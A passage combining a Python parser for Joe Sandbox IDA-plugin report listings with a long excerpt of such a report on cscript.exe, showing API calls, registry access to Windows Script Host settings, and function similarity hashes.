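SAMPLE = """\
APIs
• LoadLibraryExW.KERNEL32(WLDP.DLL,00000000,00000800,?,00000000,?,00407DA1,?,?,?,?,?,?,?), ref: 0040B1E9
• GetProcAddress.KERNEL32(00000000,WldpGetLockdownPolicy), ref: 0040B1FF
• GetProcAddress.KERNEL32(00000000,WldpIsClassInApprovedList), ref: 0040B216
• FreeLibrary.KERNEL32(00000000,?,?,?), ref: 0040B2B6
• GetLastError.KERNEL32(?,?,?), ref: 0041124B
Strings
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: AddressLibraryProc$ErrorFreeLastLoad
• String ID: WLDP.DLL$WldpGetLockdownPolicy$WldpIsClassInApprovedList
• API String ID: 1004692917-3104440107
• Opcode ID: c2e59984b4ab170b1a6120ddab7edd5e23153710f18b4e21200bd8bc1348e5c5
• Instruction Fuzzy Hash: 03217E75900216ABC7118F98D898BAEBBB4EB44711F1481BAED09F7390DB7899408BDD
APIs
  • Part of subcall function 0040C93B: memcmp.MSVCRT ref: 0040C93F
• VariantClear.OLEAUT32(?), ref: 00413469
• SysFreeString.OLEAUT32(00000000), ref: 0041349B
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: FreeString$ClearVariantmemcmp
• String ID:
• API String ID: 1922676145-0
• Opcode ID: b96cb0af5c2a5b21c3f0e5ab5712e65ff4d8a3a00d1936c8d4b01886c4d95c54
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# One "APIs" bullet in any of the three shapes the report uses:
#   Api.MODULE(args), ref: ADDR  |  Api.MODULE ref: ADDR  |  Part of subcall function X: Api.MODULE ...
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                      # address of the call site
    subcall_of: Optional[int]     # callee the plugin attributed the call to, if any


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # "Opcode ID", "String ID", "Snapshot File", ...

    @property
    def strings(self) -> List[str]:
        s = self.fields.get("String ID", "")
        return s.split("$") if s else []         # "$" separates strings; empty ID -> no strings

    def direct_apis(self) -> set:
        return {c.api for c in self.calls if c.subcall_of is None}


def parse_records(text: str) -> List[FunctionRecord]:
    records, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()                        # drops the extra indent of subcall lines
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":                    # every record opens with its APIs block
                cur = FunctionRecord()
                records.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m is None:
                raise ValueError(f"unrecognised API line: {body!r}")
            args = m.group("args")
            cur.calls.append(ApiCall(m.group("api"), m.group("module"),
                                     args.split(",") if args is not None else [],
                                     int(m.group("ref"), 16),
                                     int(m.group("caller"), 16) if m.group("caller") else None))
        else:                                     # "Key: value" bullets of the other sections
            key, _, value = body.partition(":")
            cur.fields[key.strip()] = value.strip()
    return records


def dynamic_imports(records: List[FunctionRecord]) -> dict:
    """Map each GetProcAddress target name to the call sites that resolve it."""
    out = {}
    for r in records:
        for c in r.calls:
            if c.api == "GetProcAddress" and len(c.args) >= 2:
                out.setdefault(c.args[1], []).append(c.ref)
    return out


def functions_resolving(records: List[FunctionRecord], symbol: str) -> List[FunctionRecord]:
    """Records whose String ID or API arguments mention `symbol`."""
    return [r for r in records if symbol in r.strings or any(symbol in c.args for c in r.calls)]


def index_by_opcode(records: List[FunctionRecord]) -> dict:
    """Opcode ID keyed index, the stable handle for diffing two reports' functions."""
    return {r.fields["Opcode ID"]: r for r in records if "Opcode ID" in r.fields}


if __name__ == "__main__":
    for name, sites in dynamic_imports(parse_records(SAMPLE)).items():
        print(name, [f"{s:08X}" for s in sites])
```

Run against the full "APIs" listing of a report, `dynamic_imports` gives the run-time resolved names to check against the sample's static import table, and `index_by_opcode` lets two reports be compared on function identity rather than on addresses, which change between process images.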
APIs
• malloc.MSVCRT ref: 00416D4F
• SysStringLen.OLEAUT32(?), ref: 00416D68
• SysAllocString.OLEAUT32(?), ref: 00416D76
• SysStringLen.OLEAUT32(?), ref: 00416D86
• SysAllocString.OLEAUT32(?), ref: 00416D93
• SysFreeString.OLEAUT32(?), ref: 00416DA9
• SysFreeString.OLEAUT32(?), ref: 00416DB8
• free.MSVCRT(00000000,?,00416491,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416DBF
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: String$AllocFree$freemalloc
• String ID:
• API String ID: 945414394-0
                                                                                                                                                                                                        • Opcode ID: 8abab04a00de18a45fd07fca4b624f4b9b167981c4b06ac0a57df1d5d37bdf9b
                                                                                                                                                                                                        • Instruction ID: 1d5d5a5b7359d5fd1192bc47b6cfc8c607cf46e3d3f41ff53f9760fa76f433fa
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8abab04a00de18a45fd07fca4b624f4b9b167981c4b06ac0a57df1d5d37bdf9b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E11A031200706AFDB205F25FC08ADB7BA5EF00360F02C43AF819C62A0DB35D8A0CB59
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00414F81
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00414F8A
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00414F93
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00414F9C
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00414FA5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • WScript_OnScriptTerminate, xrefs: 00414EE1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeString
                                                                                                                                                                                                        • String ID: WScript_OnScriptTerminate
                                                                                                                                                                                                        • API String ID: 3341692771-526745235
                                                                                                                                                                                                        • Opcode ID: 651bf8efeb46c8c06015a9f56c2bb32dc4aa915cc938d610eb3da069c7ed0e0b
                                                                                                                                                                                                        • Instruction ID: 03d6c0b7c2ab9785bd9e566faeba606b57e099374c30ce540e28392e9c9de7ce
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 651bf8efeb46c8c06015a9f56c2bb32dc4aa915cc938d610eb3da069c7ed0e0b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C819671A00205DFCF14DF94D895AEE7BB5FF88315F10416AE512A73A0DB38AD82CB99
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(0040ECAE,00000104,?,?,?,?,?,?,?,?), ref: 00408188
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 004104DC
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0040ECAE,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00410503
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharErrorFullLastMultiNamePathWide
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1285381999-0
                                                                                                                                                                                                        • Opcode ID: 5d9a2d1d488a1c959aa0ee6211e3ef3371205ce35b7f4ae90d6094007c97f9ef
                                                                                                                                                                                                        • Instruction ID: e8332dd31b0591038187e0315656b13b42a81ba3c21ff7ee16ba739c6c010f42
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d9a2d1d488a1c959aa0ee6211e3ef3371205ce35b7f4ae90d6094007c97f9ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C431A97160112ABBDB205F668C48DEB7F6CEF46374B108139B955E6290CA74CD41C7F9
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000000), ref: 0040B120
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 0040B158
                                                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0040B172
                                                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0040B183
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000800), ref: 0040B194
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00411212
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectorySystemstrcpy_s$ErrorLastLibraryLoad
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3723718217-0
                                                                                                                                                                                                        • Opcode ID: 040b070500c1cb4eb663a4c6381045db7deee91aea24930c33a48f59653946e4
                                                                                                                                                                                                        • Instruction ID: 0e629bb73c2f6b5dd4994b98eabfab2bcbd9547b25440ef91d639fe5839e0da3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 040b070500c1cb4eb663a4c6381045db7deee91aea24930c33a48f59653946e4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71212772A00216ABC3119FA49C44BAB77A8EF44740F184176E945EB250EB3DD8448BEE
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,?,00000000,0040F129,00000000,?,?,?,80000001,80000001,?,00412623), ref: 004174BE
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,?,?,?,80000001,80000001,?,00412623,00020006), ref: 004174E0
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00412623,00020006,?,?,?,?,0040F129), ref: 004174EC
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,00412623,00020006,?,?,?,?,0040F129), ref: 0041750D
                                                                                                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,?,00000000,0040F129,00000000,?,00000000,00000000,00000000,?,00412623,00020006), ref: 00417526
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharCreateMultiWide$ErrorLast
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows Script Host\Settings
                                                                                                                                                                                                        • API String ID: 3494534822-2126348837
                                                                                                                                                                                                        • Opcode ID: 991cdf4b7798d207e4d0d31d602e58d386c16a9154cf551ca22e4a7a9c63f381
                                                                                                                                                                                                        • Instruction ID: 75024dcd7f7a6ccb3144a682b438e2f0e5b4e7022879cb89ba7316455258348d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 991cdf4b7798d207e4d0d31d602e58d386c16a9154cf551ca22e4a7a9c63f381
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2119331606124BBCB215F679C4DEEB3EBDEF0A7B5B108126B50DE1190DA38C940D6F9
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,Timeout,00000000,00000004,?,00000004,?,?,?,0040F129), ref: 0041787B
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Timeout,000000FF,00000000,00000000,00000000,00000000,?,?,?,0040F129), ref: 00417892
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 0041789F
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,00000004,?,?,?,0040F129), ref: 004178D1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$ByteCharErrorLastMultiWide
                                                                                                                                                                                                        • String ID: Timeout
                                                                                                                                                                                                        • API String ID: 1054387349-1325157390
                                                                                                                                                                                                        • Opcode ID: f6c2d6639d9e602e2be25c53e06a1ba2beae8f1285e7d74e4fdcccc5d3d36f49
                                                                                                                                                                                                        • Instruction ID: 3fef3282e4a9f90a968db19fb7be140468da14f039f3e6bdd5d5d0bd0f894706
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6c2d6639d9e602e2be25c53e06a1ba2beae8f1285e7d74e4fdcccc5d3d36f49
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC112170A05214BBD720ABA6CC0DFEB7F7CDF467A0F108129B219D22D0DA788944C7B9
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00407E00
                                                                                                                                                                                                          • Part of subcall function 00408156: GetFullPathNameW.KERNEL32(0040ECAE,00000104,?,?,?,?,?,?,?,?), ref: 00408188
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00407D2B
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00407D45
                                                                                                                                                                                                          • Part of subcall function 0040B1D0: LoadLibraryExW.KERNEL32(WLDP.DLL,00000000,00000800,?,00000000,?,00407DA1,?,?,?,?,?,?,?), ref: 0040B1E9
                                                                                                                                                                                                          • Part of subcall function 0040B1D0: GetProcAddress.KERNEL32(00000000,WldpGetLockdownPolicy), ref: 0040B1FF
                                                                                                                                                                                                          • Part of subcall function 0040B1D0: GetProcAddress.KERNEL32(00000000,WldpIsClassInApprovedList), ref: 0040B216
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00407DA4
                                                                                                                                                                                                          • Part of subcall function 0040AE90: GetProcAddress.KERNEL32(00000000,SaferIdentifyLevel), ref: 0040AF21
  • Part of subcall function 0040AE90: GetProcAddress.KERNEL32(00000000,SaferComputeTokenFromLevel), ref: 0040AF3B
  • Part of subcall function 0040AE90: GetProcAddress.KERNEL32(00000000,SaferCloseLevel), ref: 0040AF55
  • Part of subcall function 0040AE90: memset.MSVCRT ref: 0040AF7D
  • Part of subcall function 0040AE90: memset.MSVCRT ref: 0040AFB9
  • Part of subcall function 004062F0: SendMessageA.USER32(?,00000402,00000000,00000000), ref: 004063D6
Strings
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: AddressProc$String$Allocmemset$CloseFreeFullHandleLibraryLoadMessageNamePathSend
• String ID: .wsf
• API String ID: 2713354114-2429851548
• Opcode ID: 4415f84b3e06ac1a5f92366c7f6e930500f947cb5a987b6010b3b106a8a1e6de
• Instruction ID: 543c0919ee074b9554be98230dd68c5d29de2e01f2423e2b9133579f23eeb7cc
• Opcode Fuzzy Hash: 4415f84b3e06ac1a5f92366c7f6e930500f947cb5a987b6010b3b106a8a1e6de
• Instruction Fuzzy Hash: A371D635E402299BCB249F54CC986EE76A5AF44314F1501FBE806B7391CA7CADC18BDA
APIs
• LoadLibraryExW.KERNEL32(kernel32.dll,00000000,00000800,-00000001,?,-00000004,?,?,00407147,00000000,00000001), ref: 0040A8FA
• GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 0040A90C
• FreeLibrary.KERNEL32(00000000,?,?,00407147,00000000,00000001), ref: 0040A939
Strings
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: HeapSetInformation$kernel32.dll
• API String ID: 145871493-3597996958
• Opcode ID: a4d31ed78d6f094a4157fd71169f5d558e6a6a691b23bb8ef430e4ce3da59d0c
• Instruction ID: d4e72b93a31bf5a4427599b3bb06e70ac5c1f1ee0c198771444c130facf2d5de
• Opcode Fuzzy Hash: a4d31ed78d6f094a4157fd71169f5d558e6a6a691b23bb8ef430e4ce3da59d0c
• Instruction Fuzzy Hash: C5F0C8B230434177D3201B765C49E6B3E6DD7C5B61F254836F502F22C0E978CC51926A
APIs
• CreateFileW.KERNEL32(0040B2EA,80000000,00000001,00000000,00000003,08000000,00000000,?,00000000,?,000000FF,000000FF,?,0040B2EA,?), ref: 0040B547
• WideCharToMultiByte.KERNEL32(00000000,00000000,0040B2EA,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,000000FF,000000FF,?,0040B2EA,?), ref: 004113BA
• GetLastError.KERNEL32(?,0040B2EA,?,?,?,?,00000000,00000000), ref: 004113DB
  • Part of subcall function 0040B580: GetFileSize.KERNEL32(0040B2EA,00000000,00000000,?,0040B55F,00000000,?,?,0040B2EA,?,?,?,?,00000000,00000000), ref: 0040B595
  • Part of subcall function 0040B580: CreateFileMappingA.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B5B6
  • Part of subcall function 0040B580: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040B55F,00000000,?,?,0040B2EA,?,?,?,?,00000000), ref: 0040B5D0
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: File$Create$ByteCharErrorLastMappingMultiSizeViewWide
• String ID:
• API String ID: 506574795-0
• Opcode ID: c307438f9f78195f5d16abc15c4ff43356e3018b70c572dc6eaacf8a2dcbce8f
• Instruction ID: af3416d74fb726c0c47c6b1a6f3aa103412d748d0bee3d0a45132b5137fa810b
• Opcode Fuzzy Hash: c307438f9f78195f5d16abc15c4ff43356e3018b70c572dc6eaacf8a2dcbce8f
• Instruction Fuzzy Hash: B0210830201219BAEB205F6A9C48FDB3E6DDF063A4F20412AB919F51E1D7789D40C6FD
APIs
• EnterCriticalSection.KERNEL32(00419498), ref: 0040C155
• LeaveCriticalSection.KERNEL32(00419498), ref: 0040C192
• LoadRegTypeLib.OLEAUT32(?,?,00000000,?,?), ref: 00411651
• LeaveCriticalSection.KERNEL32(00419498), ref: 00411662
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterLoadType
• String ID:
• API String ID: 2204791303-0
• Opcode ID: 4b4b55254079654069af944184cb8224518bafe14a335a8be55b8cda5e021ff6
• Instruction ID: ad7f7f4cd523d170f23ff26127721049b148f8dc12106d8e42373cc3d0703c77
• Opcode Fuzzy Hash: 4b4b55254079654069af944184cb8224518bafe14a335a8be55b8cda5e021ff6
• Instruction Fuzzy Hash: 1C21A034300205EFC710DF98DC84BAA77B5FF88310F24416AE9069B391D779AC52DB9A
APIs
• RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?,?,?,?,80000000,80000000,?,00407F9E,?,?,?,?), ref: 00408134
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,80000000,80000000,?,00407F9E,?), ref: 00410495
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?,00407F9E,?,?,?,?,?), ref: 004104B6
• RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,00020019,?,?,?,?,80000000,80000000,?,00407F9E,?,?,?,?), ref: 004104D1
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: ByteCharMultiOpenWide
• String ID:
• API String ID: 471680335-0
• Opcode ID: 4a76e1f2eb5863a6df63a6fa7d6b76b440a2c1bd9b3053e46e1675eadf7425d4
• Instruction ID: 3a807e069bba6d6c2ff4a14daaf2d5931043fd0b66c12e8c6bb40dd879f7c362
• Opcode Fuzzy Hash: 4a76e1f2eb5863a6df63a6fa7d6b76b440a2c1bd9b3053e46e1675eadf7425d4
• Instruction Fuzzy Hash: 0111E970A01215BEEB205F769C48EFB7AACDF48364F10852AB915D61D1DA78CC80D679
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: wcscpy_s
• String ID: WSH
• API String ID: 4009619764-2133009938
• Opcode ID: 14cacd0457c96a9b106f8b6e7934d7291b85f4e7c86aa3e256102048bb843386
• Instruction ID: b40d03c92710f10e936c82851957cf212c1e1d7fb78f42dc0843a08acb6a05c4
• Opcode Fuzzy Hash: 14cacd0457c96a9b106f8b6e7934d7291b85f4e7c86aa3e256102048bb843386
• Instruction Fuzzy Hash: 39515970A042159BDB24DB14CC85BBA7369FB44314F1445BBE906A73C0DB39BD42CBAA
APIs
  • Part of subcall function 0040DBC0: malloc.MSVCRT ref: 0040DBD8
• SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 0040A1C1
• SysAllocString.OLEAUT32(?), ref: 0040A1FE
• SafeArrayPutElement.OLEAUT32(2C6A5756,?,?), ref: 0040A21D
• VariantClear.OLEAUT32(?), ref: 0040A22A
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: ArraySafe$AllocClearCreateElementStringVariantmalloc
• String ID:
• API String ID: 90143694-0
• Opcode ID: 872d98077140fd6e5aa7cbdd36bbd5fd78a25e75bf74e113c43c91fa65265e02
• Instruction ID: 29fac1f8024a2f76bdefdb532a7e0bc1aa223bbe4a17317b62d33d50eb008a15
• Opcode Fuzzy Hash: 872d98077140fd6e5aa7cbdd36bbd5fd78a25e75bf74e113c43c91fa65265e02
• Instruction Fuzzy Hash: 25417271A002069BDB00DFA5C880AEEB7B5FF44314F1081BAD915EB350DB79ED91CB9A
APIs
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 004080BD
• RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00410407
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0041043D
• GetLastError.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0041044B
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: QueryValue$ByteCharErrorLastMultiWide
• String ID:
• API String ID: 1671509117-0
• Opcode ID: f45af9d0f61546047dab5e8213e02a68fa7a3441be714861e795b67a57449b2f
• Instruction ID: e655dcfdbaf998bcae5477ba737e8660124b5760f489e81d8e2fc3bcaf1c3bb3
• Opcode Fuzzy Hash: f45af9d0f61546047dab5e8213e02a68fa7a3441be714861e795b67a57449b2f
• Instruction Fuzzy Hash: 9431D330A00108BBEB209B549D85BEF7BB8EB04320F11C06BF951EB2D1DA79DD84874D
APIs
• SafeArrayDestroy.OLEAUT32(?), ref: 0040A43E
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0040A47F
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0040A488
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0040A491
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeString$ArrayDestroySafe
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4164600000-0
                                                                                                                                                                                                        • Opcode ID: fb5a40082543a661828d7f5174f772c806e808ecc7f487910fdd956538f2543f
                                                                                                                                                                                                        • Instruction ID: 859c20d385a4c0a978f8bf8cdd67a9c01129832651b18f39bded71179d752d67
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb5a40082543a661828d7f5174f772c806e808ecc7f487910fdd956538f2543f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 082178746013049FC7209F25C98896BBBF5EF44314B10893EE146A3BA0CB7AAC908B4E
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileSize.KERNEL32(0040B2EA,00000000,00000000,?,0040B55F,00000000,?,?,0040B2EA,?,?,?,?,00000000,00000000), ref: 0040B595
                                                                                                                                                                                                        • CreateFileMappingA.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B5B6
                                                                                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040B55F,00000000,?,?,0040B2EA,?,?,?,?,00000000), ref: 0040B5D0
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0040B55F,00000000,?,?,0040B2EA,?,?,?,?,00000000,00000000), ref: 0041142A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CreateErrorLastMappingSizeView
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2735091159-0
                                                                                                                                                                                                        • Opcode ID: 2a270477d37feb6e52a06446fbc4b38a28089576a3faf3db235db5bc9ea5fa25
                                                                                                                                                                                                        • Instruction ID: 335535d9dd9c9da26fd3cf063ae7c58b78333c34cbbc4b1effd1684dbde355c0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a270477d37feb6e52a06446fbc4b38a28089576a3faf3db235db5bc9ea5fa25
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9701A270240302BBE7315F355C09B633AD8AF04B24F348536BA69EA2E0E778D840865D
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,0040C4E7,?,?,?), ref: 0040C598
                                                                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000015,00403BD4,?,?,?,?,0040C4E7,?,?,?), ref: 0040C5DE
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFromInstanceProg
                                                                                                                                                                                                        • String ID: WScript.CreateObject
